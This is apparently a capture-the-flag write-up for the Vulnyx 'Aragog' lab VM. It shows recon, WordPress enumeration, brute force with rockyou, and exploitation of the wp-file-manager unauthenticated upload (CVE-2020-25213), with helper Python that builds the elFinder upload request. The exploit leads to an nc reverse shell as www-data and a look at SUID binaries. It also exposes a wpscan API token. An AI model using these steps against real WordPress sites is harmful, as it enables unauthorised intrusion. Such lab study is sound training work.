Aragog-1 - Vulnyx - Level: Medium - Report

Medium

Tools used

nmap
nikto
enum4linux
ftp
gobuster
strings
smbclient
unzip
dex2jar
jd-gui
curl
wfuzz
wpscan
nc
vi
hash-identifier
john


Reconnaissance

In this phase we gather information about the target. It is the basis for finding weaknesses later: we use several tools to determine network services, open ports and other relevant details.

The goal is a complete picture of the system and its exposed attack surface. Everything collected here drives the following steps of the test.

┌──(root㉿CCat)-[~]
└─# ARP-Scan
192.168.2.127 08:00:27:b4:5b:fa PCS Systemtechnik GmbH

With arp-scan we look for live hosts on the local network. The output shows 192.168.2.127 with the MAC address 08:00:27:b4:5b:fa; the OUI 08:00:27 is registered to PCS Systemtechnik GmbH, which is the prefix Oracle VirtualBox uses for its virtual NICs.

This identifies the target on the network for the next steps, and the vendor prefix already tells us we are dealing with a VirtualBox guest.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.127 Aragog.vln

We add the target IP (192.168.2.127) with the hostname Aragog.vln to /etc/hosts so the web server can be addressed by name.

Web Enumeration

In this phase we enumerate the exposed services, starting with a full port scan and then concentrating on the web server to find hidden files, directories and weaknesses. We use Nmap, Nikto, wfuzz, gobuster and wpscan.

┌──(root㉿CCat)-[~]
└─# nmap -sV -A --script vuln 192.168.2.127 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 19:57 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for Aragog.vln (192.168.2.127)
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
| CVE-2023-38408 9.8 https://vulners.com/cve/CVE-2023-38408
| B8190CDB-3EB9-5631-9828-8064A1575B23 9.8 https://vulners.com/githubexploit/B8190CDB-3EB9-5631-9828-8064A1575B23 *EXPLOIT*
| PACKETSTRM:164418 0.0 https://vulners.com/packetstorm/PACKETSTRM:164418 *EXPLOIT*
| PACKETSTRM:152441 0.0 https://vulners.com/packetstorm/PACKETSTRM:152441 *EXPLOIT*
| EDB-ID:47689 0.0 https://vulners.com/exploitdb/EDB-ID:47689 *EXPLOIT*
| EDB-ID:47688 0.0 https://vulners.com/exploitdb/EDB-ID:47688 *EXPLOIT*
| CVE-2024-39884 0.0 https://vulners.com/cve/CVE-2024-39884
| CVE-2024-36387 0.0 https://vulners.com/cve/CVE-2024-36387
| CVE-2024-24795 0.0 https://vulners.com/cve/CVE-2024-24795
|_ CVE-2023-38709 0.0 https://vulners.com/cve/CVE-2023-38709
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-enum:
| /blog/: Blog
|_ /blog/wp-login.php: Wordpress login page.
MAC Address: 08:00:27:B4:5B:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.17 ms Aragog.vln (192.168.2.127)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.46 seconds

This Nmap scan identifies the open ports and services: 22/tcp with OpenSSH 7.9p1 (the Debian 10 package) and 80/tcp with Apache 2.4.38.

The scan also reports the MAC address, an OS guess and the network distance. The vulners script lists CVEs for OpenSSH 7.9p1, including CVE-2023-38408, but these are matched on the version string alone and need to be read with care: CVE-2023-38408 is in ssh-agent's PKCS#11 support and is only reachable when a victim forwards an agent to a host we control, and the CVE-2024-* and CVE-2023-38709 entries are Apache httpd issues that vulners prints under the OpenSSH block. None of this gives us a foothold, so it is noted and not pursued. The useful result is http-enum: a blog under /blog/ with a WordPress login page at /blog/wp-login.php.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))

This command repeats the scan over all 65535 ports and filters the output for open ones. The result confirms the earlier findings: only SSH (22) and HTTP (80).

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 19:58 CEST
Nmap scan report for Aragog.vln (192.168.2.127)
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B4:5B:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.15 ms Aragog.vln (192.168.2.127)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds

Now we look at the open ports in detail, starting with the web server on port 80.

┌──(root㉿CCat)-[~]
└─# Nikto v2.5.0
+ Target IP: 192.168.2.127
+ Target Hostname: 192.168.2.127
+ Target Port: 80
+ Start Time: 2024-10-03 19:59:34 (GMT2)

+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 61, size: 5bee8467b5fd6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /blog/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /blog/wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2024-10-03 19:59:49 (GMT2) (15 seconds)

+ 1 host(s) tested

The Nikto scan on port 80 reports several low-severity findings: the X-Frame-Options and X-Content-Type-Options headers are missing, the ETag may leak inode numbers (CVE-2003-1418), and Apache 2.4.38 is out of date (it is the stock Debian 10 package; the version string alone does not prove an exploitable bug).

The WordPress hints and /blog/wp-login.php confirm the CMS. The wordpress_test_cookie without the HttpOnly flag is a hardening remark rather than an attack path: a missing HttpOnly flag does not cause XSS, it only lets script read the cookie if an XSS already exists, and this particular cookie carries no session.
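Nikto's cookie finding is the kind of check that is easy to script and apply to every Set-Cookie header a site sends. The following Python is an added example (not part of the original write-up and not Nikto's code): it parses raw Set-Cookie values and reports which of HttpOnly, Secure and SameSite each cookie lacks. The three sample headers are constructed for the example, and the name-based heuristic for "session-like" cookies is an assumption.

```python
"""Audit Set-Cookie header values for missing security attributes.

Added example, not from the original write-up. The sample headers below are
constructed; the first one mirrors Nikto's finding (no HttpOnly).
"""
from dataclasses import dataclass, field
from typing import Dict, Iterable, List

# Constructed sample headers, as a server like the one above might send them.
SAMPLE_HEADERS = [
    "wordpress_test_cookie=WP+Cookie+check; path=/blog/",
    "PHPSESSID=abc123; path=/; HttpOnly",
    "wordpress_logged_in_x=hagrid98%7C...; path=/blog/; HttpOnly; Secure; SameSite=Lax",
]

# Assumption: cookies whose names contain these fragments hold a session/auth token.
SESSION_HINTS = ("sess", "logged_in", "auth", "token")


@dataclass
class CookieReport:
    name: str
    attributes: Dict[str, str] = field(default_factory=dict)
    missing: List[str] = field(default_factory=list)
    session_like: bool = False


def parse_set_cookie(header: str) -> CookieReport:
    """Split a Set-Cookie value into the cookie name and a lower-cased attribute map."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return CookieReport(name=name, attributes=attrs)


def audit_cookie(header: str, https: bool = True) -> CookieReport:
    """Flag missing HttpOnly / Secure / SameSite.

    HttpOnly keeps script (and therefore an XSS payload) from reading the
    cookie; it does not prevent XSS itself. Secure is only meaningful when
    the site is served over HTTPS, so it is skipped for plain-HTTP targets.
    """
    report = parse_set_cookie(header)
    report.session_like = any(h in report.name.lower() for h in SESSION_HINTS)
    if "httponly" not in report.attributes:
        report.missing.append("HttpOnly")
    if https and "secure" not in report.attributes:
        report.missing.append("Secure")
    if "samesite" not in report.attributes:
        report.missing.append("SameSite")
    return report


def audit_all(headers: Iterable[str], https: bool = True) -> Dict[str, List[str]]:
    """Return {cookie name: [missing attributes]} for a list of Set-Cookie values."""
    return {r.name: r.missing for r in (audit_cookie(h, https) for h in headers)}


if __name__ == "__main__":
    # The target above speaks plain HTTP, so Secure is not required here.
    for name, missing in audit_all(SAMPLE_HEADERS, https=False).items():
        print(f"{name}: missing {missing or 'nothing'}")
```

Run it against the headers captured with `curl -I`; only cookies that are session-like and miss HttpOnly deserve a finding above informational.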

┌──(root㉿CCat)-[~]
└─# wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://aragog.vln" -H "Host: FUZZ.aragog.vln" --hc "404" --hh 97
Target: http://aragog.vln/
Total requests: 114442

-------------------------------------------------------------------
ID Response Lines Word Chars Payload
-------------------------------------------------------------------

000009533: 400 12 L 53 W 426 Ch "#www"
000010582: 400 12 L 53 W 426 Ch "#mail"
000047707: 400 12 L 53 W 426 Ch "#smtp"
000103136: 400 12 L 53 W 426 Ch "#pop3"

Total time: 0
Processed Requests: 114442
Filtered Requests: 114438
Requests/sec.: 0

With wfuzz we look for virtual hosts under aragog.vln, hiding 404 responses and responses of 97 bytes (the size of the default index.html). The only hits are 400 Bad Request for payloads beginning with "#": these are comment lines from the wordlist, which produce an invalid Host header, not real virtual hosts. So no additional vhost exists under aragog.vln. Note that a vhost on a different parent domain, which is what this box turns out to use, cannot be found with this kind of fuzzing at all.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.127/index.html (Status: 200) [Size: 97]
http://192.168.2.127/blog (Status: 301) [Size: 313] [--> http://192.168.2.127/blog/]

With gobuster and a long extension list we look for further directories and files. Only index.html (97 bytes) and the /blog directory, which redirects to /blog/, are found.

WordPress Scan
view-source:http://192.168.2.127/blog/
src='http://wordpress.aragog.hogwarts/blog/wp-includes/js/wp-embed.min.js?ver=5.0.12'

In the page source of /blog/ the wp-embed script is loaded from http://wordpress.aragog.hogwarts, so WordPress (version 5.0.12, from the ?ver= parameter of a core script) generates its URLs with the virtual host wordpress.aragog.hogwarts. The installation is configured for that hostname, which is why the site has to be addressed by it.
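The hostname leak above can be found systematically instead of by eye: collect every absolute URL the page references, plus the REST discovery Link header, and compare the hosts with the one used for the request. The Python below is an added example, not code from the write-up; the sample HTML and Link header are constructed around the single line quoted above, and the default ignore list (wordpress.org) is an assumption.

```python
"""Find virtual-host names leaked in a page's source.

Added example, not from the original write-up. The sample HTML below is
constructed around the wp-embed line seen on the target.
"""
from html.parser import HTMLParser
from typing import Iterable, List, Set
from urllib.parse import urlsplit

URL_ATTRS = {"src", "href", "action", "data-src"}

# Constructed sample: what /blog/ might look like when fetched via aragog.vln.
SAMPLE_HTML = """<html><head>
<link rel="https://api.w.org/" href="http://wordpress.aragog.hogwarts/blog/wp-json/">
<link rel="stylesheet" href="/blog/wp-content/themes/twentynineteen/style.css?ver=1.2">
</head><body>
<script src='http://wordpress.aragog.hogwarts/blog/wp-includes/js/wp-embed.min.js?ver=5.0.12'></script>
<a href="https://wordpress.org/">WordPress</a>
</body></html>"""

# Constructed sample of the header Nikto misreports as "Drupal Link header".
SAMPLE_LINK_HEADER = '<http://wordpress.aragog.hogwarts/blog/wp-json/>; rel="https://api.w.org/"'


class _URLCollector(HTMLParser):
    """Collects values of URL-bearing attributes from every start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.urls: List[str] = []

    def handle_starttag(self, tag, attrs):
        for key, value in attrs:
            if key in URL_ATTRS and value:
                self.urls.append(value)


def hostnames_in_html(html: str) -> Set[str]:
    """Hostnames of all absolute URLs found in src/href/action attributes."""
    collector = _URLCollector()
    collector.feed(html)
    hosts = set()
    for url in collector.urls:
        host = urlsplit(url).hostname  # None for relative URLs
        if host:
            hosts.add(host.lower())
    return hosts


def hostnames_in_link_header(value: str) -> Set[str]:
    """Hostnames from an RFC 8288 Link header: <url>; rel=..., <url>; rel=..."""
    hosts = set()
    for part in value.split(","):
        part = part.strip()
        if part.startswith("<") and ">" in part:
            host = urlsplit(part[1 : part.index(">")]).hostname
            if host:
                hosts.add(host.lower())
    return hosts


def foreign_hosts(html: str, link_header: str, requested_host: str,
                  ignore: Iterable[str] = ("wordpress.org",)) -> Set[str]:
    """Hosts the page references that are neither the requested host nor known public sites.

    Anything left over is a candidate for /etc/hosts and a second round of enumeration.
    """
    hosts = hostnames_in_html(html) | hostnames_in_link_header(link_header)
    skip = {requested_host.lower(), *(h.lower() for h in ignore)}
    return {h for h in hosts if h not in skip}


if __name__ == "__main__":
    print(foreign_hosts(SAMPLE_HTML, SAMPLE_LINK_HEADER, "aragog.vln"))
```

In practice feed it the body and Link header from a single `curl -i http://aragog.vln/blog/`; here the only foreign host is wordpress.aragog.hogwarts, exactly the name added to /etc/hosts below.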

┌──(root㉿CCat)-[~]
└─# grep arag /etc/hosts
192.168.2.127 Aragog.vln wordpress.aragog.hogwarts

We add the newly found hostname to the same /etc/hosts entry.

Posted by WP-Admin March 31, 2021 Posted in Uncategorized 1 Comment

The post metadata on the blog shows the author display name WP-Admin.

┌──(root㉿CCat)-[~]
└─# wpscan --url http://wordpress.aragog.hogwarts/blog --passwords /usr/share/wordlists/rockyou.txt -e u --api-token RoBoAaM72LLsihlqUJrA1EleT6AJAd9QxQ9rbmQNCY
_______________________________________________________________

WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordpress.aragog.hogwarts/blog/ [192.168.2.127]
[+] Started: Thu Oct 3 23:32:33 2024

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

| [!] 37 vulnerabilities identified:
|
| [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
| Fixed in: 5.0.13
| References:
| - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296
| - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62
| - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
| - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9
| - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/
| References:
| - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
| Fixed in: 5.0.22
| References:
| - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
| Fixed in: 5.0.22
| References:
| - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
[+] WordPress theme in use: twentynineteen
| Location: http://wordpress.aragog.hogwarts/blog/wp-content/themes/twentynineteen/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://wordpress.aragog.hogwarts/blog/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://wordpress.aragog.hogwarts/blog/wp-content/themes/twentynineteen/style.css?ver=1.2
| Style Name: Twenty Nineteen
| Style URI: https://github.com/WordPress/twentynineteen
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordpress.aragog.hogwarts/blog/wp-content/themes/twentynineteen/style.css?ver=1.2, Match: 'Version: 1.2'


[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] WP-Admin
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By: Rss Generator (Passive Detection)

[+] wp-admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
|
[+] WPScan DB API Kro2008 Time: 00:25:42 < > (203680 / 28688956) 0.70% ETA: 59:56:26
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 23

[+] Finished: Thu Oct 3 23:58:21 2024
[+] Requests Done: 203744
[+] Cached Requests: 6
[+] Data Sent: 73.479 MB
[+] Data Received: 917.39 MB
[+] Memory used: 230.141 MB
[+] Elapsed time: 00:25:48

Scan Aborted: Canceled by User

wpscan against the WordPress installation identifies the theme (Twenty Nineteen 1.2) and lists 37 known vulnerabilities for this core version, among them the PHPMailer object injection (CVE-2020-36326, fixed in 5.0.13) and several XSS and path traversal issues that all need at least Contributor rights. User enumeration yields WP-Admin (display name) and wp-admin (author slug from ID brute forcing); WordPress exposes display name and nicename here, the real user_login can differ, and as the database shows later it does. Because -e u was combined with --passwords, wpscan went straight into a password attack against those names with rockyou; at 0.70 % after 25 minutes it was cancelled by hand, which is the "Scan Aborted" at the end.

http://wordpress.aragog.hogwarts/blog/wp-login.php?action=register
redirects to
http://wordpress.aragog.hogwarts/blog/wp-login.php?registration=disabled

User registration is disabled, so we cannot create a Contributor account for the theme/block vulnerabilities.

http://wordpress.aragog.hogwarts/blog/wp-login.php
Username: ' OR 1=1 -- -
ERROR: Invalid username. Lost your password?

A quick SQL injection probe on the login form only returns the normal "Invalid username" error, so the login is not injectable. It does confirm that WordPress tells valid and invalid usernames apart, which is what wpscan's user enumeration relies on.

┌──(root㉿CCat)-[~]
└─# nikto -h http://wordpress.aragog.hogwarts/blog
+ Target IP: 192.168.2.127
+ Target Hostname: wordpress.aragog.hogwarts
+ Target Port: 80
+ Start Time: 2024-10-03 23:46:27 (GMT2)

+ Server: Apache/2.4.38 (Debian)
+ /blog/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /blog/: Drupal Link header found with value: <http://wordpress.aragog.hogwarts/blog/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /blog/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /blog/wp-links-opml.php: This WordPress script reveals the installed version.
+ /blog/: A Wordpress installation was found.
+ /blog/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /blog/wp-login.php: Wordpress login found.
+ 8046 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2024-10-03 23:46:49 (GMT2) (22 seconds)

+ 1 host(s) tested

Nikto against the virtual host finds the usual WordPress paths and again confirms the login page. The "Drupal Link header" line is a false positive: Link: <.../wp-json/>; rel="https://api.w.org/" is the WordPress REST API discovery header, not Drupal.

┌──(root㉿CCat)-[~]
└─# wpscan --url http://wordpress.aragog.hogwarts/blog --passwords /usr/share/wordlists/rockyou.txt -e p --plugins-detection aggressive --api-token RoBoAaM72LLsihlqUJrA1EleT6AJAd9QxQ9rbmQNCY | grep -i rce
| - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability
| - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
| [!] Title: File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE


| [!] Title: File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE
| Fixed in: 6.9
| References:
| - https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213
| - https://blog.nintechnet.com/critical-zero-day-vulnerability-fixed-in-wordpress-file-manager-700000-installations/
| - https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
| - https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
| - https://blog.sucuri.net/2020/09/critical-vulnerability-file-manager-affecting-700k-wordpress-websites.html
| - https://twitter.com/w4fz5uck5/status/1298402173554958338

We run wpscan again with aggressive plugin detection and the same API key, grepping for RCE to get straight to the one finding that matters: the wp-file-manager plugin in a version below 6.9 (wpscan titles the range 6.0-6.9, fixed in 6.9), unauthenticated arbitrary file upload, CVE-2020-25213.

┌──(root㉿CCat)-[~]
└─# curl http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
{"error":["errUnknownCmd"]}

The plugin's elFinder connector, lib/php/connector.minimal.php, answers without any authentication. {"error":["errUnknownCmd"]} means the connector executed our request (there was no cmd= parameter) and replied in elFinder's JSON format. In the fixed version this file is not reachable like this, so the installed plugin is vulnerable.
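To make the connector check repeatable, and to show what the PoC whose output follows actually sends, here is an added Python example. It is not the PoC script used above and not the plugin's code. It classifies the connector's JSON reply, computes elFinder's path hash (l1_Lw is the hash of the volume root "/", the target the public PoC for CVE-2020-25213 uses), and builds the multipart body for elFinder's upload command. It performs no network request; the connector path constant and the placeholder file content are assumptions for illustration.

```python
"""Interpret the exposed elFinder connector and build its upload request.

Added example for the check above; not the PoC script whose output follows
and not the plugin's own code. No network call is made: a caller would POST
the returned body to CONNECTOR on the target.
"""
import base64
import json
import secrets
from typing import Tuple

# Assumption for illustration: connector path relative to the WordPress root.
CONNECTOR = "wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"


def connector_state(body: bytes, status: int) -> str:
    """Classify a reply from connector.minimal.php.

    'exposed' - the connector ran and answered in elFinder's JSON format
                ({"error":["errUnknownCmd"]} for a request without cmd=)
    'absent'  - 404, plugin or file not installed
    'unknown' - anything else (redirect to login, WAF page, non-JSON)
    """
    if status == 404:
        return "absent"
    try:
        data = json.loads(body.decode("utf-8", "replace"))
    except json.JSONDecodeError:
        return "unknown"
    if isinstance(data, dict) and ({"error", "added", "cwd"} & data.keys()):
        return "exposed"
    return "unknown"


def elfinder_hash(volume_id: str, path: str) -> str:
    """elFinder path hash: <volume id>_<Base64(path) with + / = mapped to - _ . and '.' stripped>.

    For the volume root "/" this yields l1_Lw, the target used by the public PoC.
    """
    enc = base64.b64encode(path.encode()).decode()
    enc = enc.replace("+", "-").replace("/", "_").replace("=", ".").rstrip(".")
    return f"{volume_id}_{enc}"


def build_upload_request(filename: str, content: bytes, target: str = "l1_Lw") -> Tuple[str, bytes]:
    """Return (Content-Type header value, body) for elFinder's 'upload' command.

    elFinder expects cmd=upload, target=<directory hash> and one or more
    upload[] file parts. With no authentication in front of the connector
    (the bug fixed in wp-file-manager 6.9) the file lands in the plugin's
    lib/files/ directory, which is the path seen in the PoC output below.
    """
    boundary = "----elfinder" + secrets.token_hex(8)
    parts = []
    for name, value in {"cmd": "upload", "target": target}.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()
        )
    parts.append(
        (f'--{boundary}\r\nContent-Disposition: form-data; name="upload[]"; filename="{filename}"\r\n'
         "Content-Type: application/octet-stream\r\n\r\n").encode()
        + content
        + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(parts)


if __name__ == "__main__":
    # Constructed sample reply, identical to the curl output above.
    print(connector_state(b'{"error":["errUnknownCmd"]}', 200))
    ctype, body = build_upload_request("test.txt", b"placeholder content")
    print(ctype, len(body), "bytes")
```

The classification is the part worth keeping in a scanner: a 200 with non-JSON content usually means the connector is wrapped by a login redirect or a WAF and is not the vulnerable configuration, while any elFinder-shaped JSON is.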

The public PoC script uploads payload.php through the connector:

Just do it... URL: http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
200
Success!?
http://wordpress.aragog.hogwarts/blog/blog/wp-content/plugins/wp-file-manager/lib/php/../files/payload.php
----------------------------------------------------------

The URL the script prints has a doubled /blog/blog/ segment; the file is actually reachable at

http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/files/payload.php

Opening that URL in the browser executes the uploaded payload, and the listener started beforehand receives the connection:
┌──(root㉿CCat)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNOWN) [192.168.2.127] 46996
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
03:57:16 up 4:29, 0 users, load average: 0.00, 0.00, 0.51
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

We have a reverse shell on the system as www-data. The target runs Debian 10 with kernel 4.19.0-16.

Local Enumeration
www-data@Aragog:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We check who we are: www-data, no extra groups.

www-data@Aragog:/$ find / -type f -perm -4000 -ls 2>/dev/null
3436 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
52 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
3908 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
3583 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
56 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
53 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
55 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
3910 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
12806 428 -rwsr-xr-x 1 root root 436552 Feb 1 2020 /usr/lib/openssh/ssh-keysign
9936 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135462 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device

Searching for SUID binaries: only the standard Debian set, nothing unusual to abuse.

www-data@Aragog:/$ ls -la /etc/passwd
-rw-r--r-- 1 root root 1585 Apr 1 2021 /etc/passwd

Permissions on /etc/passwd: writable only by root, as expected.

getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep

Checking for file capabilities: only ping with cap_net_raw, which is normal.

www-data@Aragog:/var/www/html$ cd /opt/

We move to /opt.

ls -l
total 12
drwxr-xr-x 2 root root 4096 Apr 1 2021 .
drwxr-xr-x 18 root root 4096 Mar 31 2021 ..
-rwxr-xr-x 1 hagrid98 hagrid98 81 Apr 1 2021 .backup.sh

Directory listing: a hidden script .backup.sh, owned by hagrid98 and executable by everyone.

www-data@Aragog:/var/www/html$ ls /home/
ginny hagrid98

